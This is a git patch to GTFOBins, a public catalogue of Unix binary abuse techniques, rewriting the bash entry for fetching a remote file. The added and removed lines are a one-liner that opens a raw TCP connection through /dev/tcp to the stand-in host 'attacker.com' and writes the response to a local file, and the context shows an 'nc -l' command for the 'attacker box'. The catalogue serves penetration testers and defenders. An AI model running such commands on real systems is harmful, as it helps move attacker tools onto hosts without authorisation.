From f0a22c23d3efeee7e55d5d0f6bfa72aaa850b55a Mon Sep 17 00:00:00 2001
From: Andrea Cardaci <cyrus.and@gmail.com>
Date: Fri, 25 May 2018 00:23:02 +0200
Subject: [PATCH] Fix bash download script

---
 _gtfobins/bash.md | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/_gtfobins/bash.md b/_gtfobins/bash.md
index ad39ca7..d2b6f5c 100644
--- a/_gtfobins/bash.md
+++ b/_gtfobins/bash.md
@@ -25,7 +25,9 @@ functions:
         export RHOST=attacker.com
         export RPORT=12345
         export LFILE=file_to_get
-        bash -c '(echo -e "GET /$LFILE HTTP/0.9\r\n\r\n" 1>&3 & cat 0<&3) 3<>/dev/tcp/$RHOST/$RPORT | (read i; while [ "$(echo $i | tr -d \"\r\")" != "" ]; do read i; done; cat) > $LFILE'
+        bash -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \
+            3<>/dev/tcp/$RHOST/$RPORT \
+            | { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'
     - description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file.
       code: |-
         export RHOST=attacker.com